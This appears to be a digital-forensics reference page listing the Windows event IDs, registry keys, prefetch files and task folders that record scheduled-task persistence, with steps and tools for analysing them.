Scheduled Tasks

Scheduled tasks can be used for persistence by threat actors in various ways. Key artifacts associated with the creation, execution, and management of scheduled tasks in Windows include:

Source System Artifacts:

  • Event Log:

    • Event ID 4648: Logon specifying alternate credentials.

    • Scheduled Task Events Event IDs:

      • 4698 (creation)

      • 4702 (update)

      • 4699 (deletion)

      • 4700/4701 (enabled/disabled).

  • Registry:

    • ShimCache: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache

    • BAM/DAM: SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}

    • AmCache.hve: Lists programs executed, including schtasks.exe and at.exe.

  • Prefetch:

    • C:\Windows\Prefetch\at.exe-{hash}.pf

    • C:\Windows\Prefetch\schtasks.exe-{hash}.pf

Destination System Artifacts:

  • Event Log:

    • Event ID 4624: Successful account logon.

    • Event ID 4672: Special privileges assigned to new logon.

    • Event ID 4776: The computer attempted to validate the credentials for an account.

    • Scheduled Task Events Event IDs:

      • 4698 (creation)

      • 4702 (update)

      • 4699 (deletion)

      • 4700/4701 (enabled/disabled).

  • Registry:

    • Tasks and Tree:

      • Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks

      • Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree

        • Store details of scheduled tasks.

  • File System:

    • Job Files: C:\Windows\Tasks

    • XML Task Files: C:\Windows\System32\Tasks

Overview

Scheduled tasks are integral to Windows operations, automation, and persistence mechanisms. These artifacts are pivotal:

  • Event IDs 4698, 4702, 4699, 4700 & 4701 provide forensic evidence of task manipulation.

  • Registry keys under TaskCache reveal task configurations and metadata.

  • Prefetch files for schtasks.exe and at.exe indicate execution and can help establish a timeline.

  • File paths like C:\Windows\System32\Tasks and C:\Windows\Tasks contain the actual task files, potentially including malicious tasks.

Analyzing The Artifact

  1. Examine Scheduled Tasks: Use the Task Scheduler GUI (taskschd.msc) or schtasks.exe to list and review tasks. Pay attention to tasks with unusual triggers or actions.

  2. Event Log Analysis: Investigate the Security and Microsoft-Windows-TaskScheduler operational logs for creation, modification, and execution of tasks. Correlate these events with other suspicious activities.

  3. Registry Examination: Navigate to Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache to analyze task definitions and metadata. Tools like Registry Explorer can be invaluable.

  4. Prefetch Analysis: Review prefetch files for execution patterns of schtasks.exe, at.exe, and potentially malicious executables like evil.exe.

  5. File System Scrutiny: Inspect C:\Windows\System32\Tasks and C:\Windows\Tasks for task files, especially those with recent timestamps or linked to other indicators of compromise.

Tools for Analysis

  • Task Scheduler and Command Line Utilities: For reviewing and managing scheduled tasks.

  • Windows Event Viewer: For detailed logs related to task creation, execution, and deletion.

  • Registry Tools (Registry Explorer, RECmd): For deep dives into the registry entries associated with tasks.

  • Forensic Analysis Tools (Autopsy, X-Ways Forensics): For comprehensive analysis of file systems, prefetch files, and registry keys.

  • PowerShell Scripts: Custom scripts can automate the extraction and analysis of scheduled task artifacts.

PreviousScheduled TasksNextScheduled Task Destination System Artifacts

Last updated

Was this helpful?